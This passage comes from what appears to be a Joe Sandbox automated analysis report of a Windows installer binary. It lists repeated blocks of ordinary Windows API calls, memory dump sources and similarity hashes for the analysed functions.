                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CreateErrorLastWindow
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3732789607-0
                                                                                                                                                                                                                      • Opcode ID: 50d9da87f0a648f61388eaa81ffb385885bb80077fd81f6ea880bd72e0d59b0a
                                                                                                                                                                                                                      • Instruction ID: 7338a609c390c3083f15933a7b8a96ef0ce2a8cb332519eda52a84264d4b487c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 50d9da87f0a648f61388eaa81ffb385885bb80077fd81f6ea880bd72e0d59b0a
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 25114832500209AFEB109F65CD05FAA3BA9EF48710F058569FC05971A0E774ECA0CFA0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 00A8DBA8
                                                                                                                                                                                                                        • Part of subcall function 00AF4656: RaiseException.KERNEL32(?,?,?,00A780B1,?,?,?,?,?,00A780B1,00B4F5B8,00B4F5B8), ref: 00AF4698
                                                                                                                                                                                                                      • _wcsncpy.LIBCMT ref: 00A8DBBE
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ExceptionException@8RaiseThrow_wcsncpy
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3304455579-0
                                                                                                                                                                                                                      • Opcode ID: 2ff27c77a40c7b52b708e07355f1669cb9d89717301c62e57df2741f9729aa5a
                                                                                                                                                                                                                      • Instruction ID: 1266e2b570077bd42284c11b69ffc0ea5101d2813d18d4c09519cfde3e054e1a
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2ff27c77a40c7b52b708e07355f1669cb9d89717301c62e57df2741f9729aa5a
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E301F9722002046EDB24BFA8DD86E7AF7ECEF49340B11483FF649CB1D1EAB098408750
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • __EH_prolog3_GS.LIBCMT ref: 00AC2F39
                                                                                                                                                                                                                        • Part of subcall function 00AA7451: BeginPaint.USER32(?,?), ref: 00AA746E
                                                                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 00AC2F66
                                                                                                                                                                                                                        • Part of subcall function 00AA7323: CreateCompatibleDC.GDI32(?), ref: 00AA7347
                                                                                                                                                                                                                        • Part of subcall function 00AA7323: SelectObject.GDI32(?,?), ref: 00AA736E
                                                                                                                                                                                                                        • Part of subcall function 00AA7323: SetViewportOrgEx.GDI32(?,?,?,00000000), ref: 00AA7387
                                                                                                                                                                                                                        • Part of subcall function 00AB6537: GetWindowRect.USER32(?,00000000), ref: 00AB6554
                                                                                                                                                                                                                        • Part of subcall function 00AA7395: BitBlt.GDI32(?,?,?,?,?,00000000,?,?,00CC0020), ref: 00AA73B8
                                                                                                                                                                                                                        • Part of subcall function 00AA7395: SelectObject.GDI32(00000000,?), ref: 00AA73C3
                                                                                                                                                                                                                        • Part of subcall function 00AA7395: DeleteDC.GDI32(00000000), ref: 00AA73E0
                                                                                                                                                                                                                        • Part of subcall function 00AA747C: EndPaint.USER32(?,?), ref: 00AA748C
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ObjectPaintRectSelect$BeginClientCompatibleCreateDeleteH_prolog3_ViewportWindow
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2413813215-0
                                                                                                                                                                                                                      • Opcode ID: 772db08df751d939a87af08af869c7cdd1bc27362df5591258f652278b95e6aa
                                                                                                                                                                                                                      • Instruction ID: 98a04be6d83bc2dcdf40ead5ebdcee21789456aafa44356fc1c4e13db042b12a
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 772db08df751d939a87af08af869c7cdd1bc27362df5591258f652278b95e6aa
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 28113A71C00619EFDF219BD0CD41DAEFBB9FF18304F008459E58A67561DB726A15DB20
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00A8898E: RegOpenKeyExW.KERNEL32(?,?,00000000,?,00000000), ref: 00A889A8
                                                                                                                                                                                                                      • InitializeCriticalSection.KERNEL32(?,?,00000000,?,?,00ADEAA4,?,?,00100000,00000000,0000008C), ref: 00AE20EE
                                                                                                                                                                                                                        • Part of subcall function 00A88940: RegCreateKeyExW.KERNEL32(?,?,00000000,?,?,?,?,00000000,?), ref: 00A88967
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CreateCriticalInitializeOpenSection
                                                                                                                                                                                                                      • String ID: SOFTWARE\360Safe\softmgr\dio
                                                                                                                                                                                                                      • API String ID: 2223640745-1814773269
                                                                                                                                                                                                                      • Opcode ID: 673b4aa4dbc2fedc9a08aa208c22f37a688953575003f17b120fc9f38d24c15b
                                                                                                                                                                                                                      • Instruction ID: 24e60b45a2f5f82e3afa1f8b4d66e7e372f2b52ff479f3d2ce5e6fdaa7672734
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 673b4aa4dbc2fedc9a08aa208c22f37a688953575003f17b120fc9f38d24c15b
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C4017CB0640709AFD3309F598CC1967FBECFF18751390492EE19AC3A91DA70A9048720
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 00A8ADE3
                                                                                                                                                                                                                      • GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,00000004), ref: 00A8ADF3
                                                                                                                                                                                                                        • Part of subcall function 00A8995E: __EH_prolog3_catch.LIBCMT ref: 00A89965
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FileH_prolog3H_prolog3_catchModuleName
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 749528002-0
                                                                                                                                                                                                                      • Opcode ID: b3d90422fc2cb1b183feabbecbf760e8cf7c51e7155e69e53592d87f755416f2
                                                                                                                                                                                                                      • Instruction ID: ad637fca01a6f35ca3ce7b1e5e3157dea249fd1fb9a51d98a777bb71f764b6ce
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b3d90422fc2cb1b183feabbecbf760e8cf7c51e7155e69e53592d87f755416f2
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DA01717260430C9BEB64EFA4DD46BBEB3A4FF04711F50482AF625971D1EF706A08CA50
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 00AA65F1
                                                                                                                                                                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00AA65FD
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Rect$ClientInvalidate
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 645284650-0
                                                                                                                                                                                                                      • Opcode ID: 9f06e130793caeb0d2d41488e930eb379bb99de58ea4e7789b7fde29ff5922a6
                                                                                                                                                                                                                      • Instruction ID: 03e13c2cef38d7884402d55114be673b3a3b4e92a4b551aabec20e834f964d90
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9f06e130793caeb0d2d41488e930eb379bb99de58ea4e7789b7fde29ff5922a6
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9EF08771800604ABCB21DF5AC8449AFFFFAEFE6700B10852EE156A3160DB70A940CF50
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 00A93C2A
                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(?,00000004), ref: 00A93C51
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FreeH_prolog3Library
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1631603194-0
                                                                                                                                                                                                                      • Opcode ID: 60fef726f2dbd1e454dc3fb92262b6d06e7fb8e9f99c1ad9c8ec6bb20736ff58
                                                                                                                                                                                                                      • Instruction ID: b5c2950cd18aca9a598cb615f99a41d436f6f81572bc00429a90f38a4c136b29
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 60fef726f2dbd1e454dc3fb92262b6d06e7fb8e9f99c1ad9c8ec6bb20736ff58
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 41F0A435A00B559BDF24BFB5DE426AA77E4BF00301B00486DB39697191DF70A985DB50
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • CLSIDFromProgID.COMBASE(?,?), ref: 00A874D1
                                                                                                                                                                                                                      • CoCreateInstance.OLE32(?,?,?,00B2E8A0), ref: 00A874E9
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CreateFromInstanceProg
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2151042543-0
                                                                                                                                                                                                                      • Opcode ID: 41ca528adc3799c718659b34f392c6a5c3aadc4bd7725cb2ff88e79a64343efa
                                                                                                                                                                                                                      • Instruction ID: d516a93338e48abccb9ec9cef3eca2d91bfe62e9d637f5356a16d09a2a5324bf
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 41ca528adc3799c718659b34f392c6a5c3aadc4bd7725cb2ff88e79a64343efa
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 88F01232600249EB8B10EFA9DD49DDFBBBCEB4D611B50406AB915E3150DE74EA05C761
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • CLSIDFromProgID.COMBASE(?,?), ref: 00A875C1
                                                                                                                                                                                                                      • CoCreateInstance.OLE32(?,?,?,00B2E8B0), ref: 00A875D9
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CreateFromInstanceProg
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2151042543-0
                                                                                                                                                                                                                      • Opcode ID: 3f039b83283ee01333173046e5b690bc8d0c2c3324e5d54173796182b4a7134e
                                                                                                                                                                                                                      • Instruction ID: ee40706708875a23c34fdc33da8ae7d277573f7244bbe7180e5b15a45ce161d5
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3f039b83283ee01333173046e5b690bc8d0c2c3324e5d54173796182b4a7134e
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C0F01231600209EB8B14DFA9DD09DDFBBBCEB49610B50406AB915E3150DE74EE05C761
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • PathFileExistsW.SHLWAPI(?), ref: 6C64B943
                                                                                                                                                                                                                      • PathIsDirectoryW.SHLWAPI(?), ref: 6C64B94E
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2578652771.000000006C5D1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578613735.000000006C5D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578764889.000000006C6B5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578811722.000000006C6D9000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578843526.000000006C6DB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578843526.000000006C6E0000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578843526.000000006C6FB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578843526.000000006C6FF000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2579003199.000000006C700000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2579038423.000000006C706000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_6c5d0000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Path$DirectoryExistsFile
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1302732169-0
                                                                                                                                                                                                                      • Opcode ID: 994149f79754403f2d78ffaba7126338f4e43cd2cc7eb29afdc7969582b8859f
                                                                                                                                                                                                                      • Instruction ID: 7da8d98474b00b722623256dd7631f44a69b9ddb2ff4f7faf5c1f6240affaf64
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 994149f79754403f2d78ffaba7126338f4e43cd2cc7eb29afdc7969582b8859f
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6AE04F32301A51ABD7119A6ACC48BBF36B8AFCBF94F15D41DF540EA720D714C402C6AD
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • SetLastError.KERNEL32(0000000E), ref: 00AC58A9
                                                                                                                                                                                                                      • CreateDialogParamW.USER32(000000CA,?,Function_0001A96B,?), ref: 00AC58DA
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CreateDialogErrorLastParam
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3445605341-0
                                                                                                                                                                                                                      • Opcode ID: 152790878bdd91b7d7c68a82b77876715af658e475ba4f87963f38382273caa6
                                                                                                                                                                                                                      • Instruction ID: 6920b5917e84e4d444477097714222b2d8d0e371e03707be4e3b5c4eca68ab9d
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 152790878bdd91b7d7c68a82b77876715af658e475ba4f87963f38382273caa6
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1DE0D831655310BFE220BB31DD07F977E65BF28B12F010C79B555A20E0EBA0A400D766
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • SetLastError.KERNEL32(0000000E), ref: 00ACE871
                                                                                                                                                                                                                      • CreateDialogParamW.USER32(000000C9,?,Function_0001A96B,?), ref: 00ACE8A2
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CreateDialogErrorLastParam
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3445605341-0
                                                                                                                                                                                                                      • Opcode ID: cefb44b02bce383b1c4539d682b471ee7c1b1b8cf2f5449dd5f7bcb91c72b157
                                                                                                                                                                                                                      • Instruction ID: c6b5024538eb572fbcd331e22278551861e941318c553e02702e730af374d3f7
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cefb44b02bce383b1c4539d682b471ee7c1b1b8cf2f5449dd5f7bcb91c72b157
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D6E04831295310BFE220BB21DD06F977E65AF28B12F010C79B555B60E0EBA1D415C765
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • SetLastError.KERNEL32(0000000E), ref: 00A8AA58
                                                                                                                                                                                                                      • CreateDialogParamW.USER32(00000081,?,Function_0001A96B,?), ref: 00A8AA89
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CreateDialogErrorLastParam
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3445605341-0
                                                                                                                                                                                                                      • Opcode ID: b24e9446fb5083c74a274095dc9da4ea1bc60faada0a54bc581e41452cbcdb79
                                                                                                                                                                                                                      • Instruction ID: c0f5d8517b91850acff39a6e6899503cf7028df701f12fe3f2fb62874a6d3152
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b24e9446fb5083c74a274095dc9da4ea1bc60faada0a54bc581e41452cbcdb79
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B6E0D831554310BFE220BB20DD06FAB7F65BF28B12F004825B555A20E0FBE0D805CB66
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • SysFreeString.OLEAUT32 ref: 00A87FFA
                                                                                                                                                                                                                      • SysAllocString.OLEAUT32(?), ref: 00A88005
                                                                                                                                                                                                                        • Part of subcall function 00A7DFB0: __CxxThrowException@8.LIBCMT ref: 00A7DFC2
                                                                                                                                                                                                                      Memory Dump Source
